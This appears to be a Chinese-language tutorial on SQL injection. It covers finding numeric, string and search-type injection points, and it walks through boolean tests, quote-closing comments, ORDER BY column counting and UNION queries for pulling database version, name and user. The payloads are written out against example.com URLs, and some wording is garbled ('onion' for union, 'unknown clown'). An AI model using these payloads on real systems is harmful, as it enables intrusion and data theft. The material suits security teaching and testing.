SQL inject

1 基本概念

1.1 SQL inject 漏洞概述

    在owasp发布的top 10漏洞里面，注入漏洞一直是危害排名第一，其中主要是指数据库注入型漏洞。

    数据库注入漏洞，主要是开发人员在构建代码的时候，对输入边界没有进行过滤或者过滤不足，导致攻击者可以通过合法的输入点提交一些精心构造的语句，从而欺骗后台数据库对其进行执行，导致数据库信息泄露的一种漏洞。

例如：

1.2 SQL inject漏洞攻击流程及注入类型

1.2.1 注入点发现

自动方式：使用web漏洞扫描工具，自动进行注入点的发现。

手动方式：手工构造sql语句进行注入点的发现。

---

常见注入点类型：

数字型：    user_id=$id

字符型：    user_id="$id"

搜索型：    text LIKE '%{_GET['search']}%'

---

判断注入点：

数字型注入：    http://www.example.com/?id=7

提交：7    http://www.example.com/?id=7;

数据库执行：    select *from example_table where id=7;

显示正常页面

提交：7 and 1=1     http://www.example.com/?id=7 and 1=1;

数据库执行    select *from example_table where id=7 and 1=1;

显示正常页面

提交：7 and 1=2     http://www.example.com/?id=7 and 1=2;

数据库执行    select *from example_table where id=7 and 1=2;

显示异常页面，说明and 1=2被数据库进行了处理。

单引号测试：http://www.example.com/?id=`;

显示异常页面报错，可以通过报错的信息知道，后台是否对单引号进行了处理。

---

字符型注入：http://www.example.com/?name='8'

原理同数字型注入。

提交：8

select *from example_table where name='8';

提交：8 and 1=1

 select *from example_table where name='8 and 1=1';

并不会成功。

提交：8’ and 1=1 --  注释掉数据库中后面的单引号。

select *from example_table where name='8’ and 1=1-- ';    

提交：8’ and 1=2 --  注释掉数据库中后面的单引号。

select *from example_table where name='8’ and 1=2-- ';

单引号测试：

select *from example_table where name='‘’; 

语法报错，根据错误信息确认是否存在注入点。

---

搜索性注入：http://www.example.com/search.php?search=1

输入1：

select *from comment where comment_tex like '%1%';

输入1%’ and 1=1-- 或者 1%’ and '%1%' = '%2

select *from comment where comment_tex like '%1%' and 1=1-- %';

select *from comment where comment_tex like '%1%' and '%2%';

总而言之，就是对SQL中的各类型的输入进行闭合测试，构造合法SQL，欺骗后台执行。

---

1.2.2 信息获取

环境信息：数据库类型、数据库版本、操作系统版本、用户信息等

数据库信息：数据库名称、数据库表、表字段、字段内容（加密内容破解）。

onion联合查询：

    想要获得更多的信息可以使用onion联合查询，联合查询的时候列数需要和主查询相同。如何确认主查询的列数呢？

    使用order by确认主查询的列，就可以使用union构造相应的查询。order by x 是对结果进行排序，按照第x列进行排序，默认数字0-9，字母a-z，如果查询出来的结果有2列，说明这个语句查询了两个字段。

    如：提交1' order by 2# 回显正常，1' order by 3#提示：unknown clown，则表示一共有2列。

    接下来就可以构造联合查询了，先构造一个不成立的查询（或空条件），使得前面查询结果为空，然后使用union 1，2进行求值。这样就可以得到每个字段的名称，select 字段1、字段2 from users where id = ‘1’ union select 字段1，字段2 # 。

可以通过select version();获取当前数据库版本；

select database();获取当前数据库；

select user();取得当前登录的用户；

---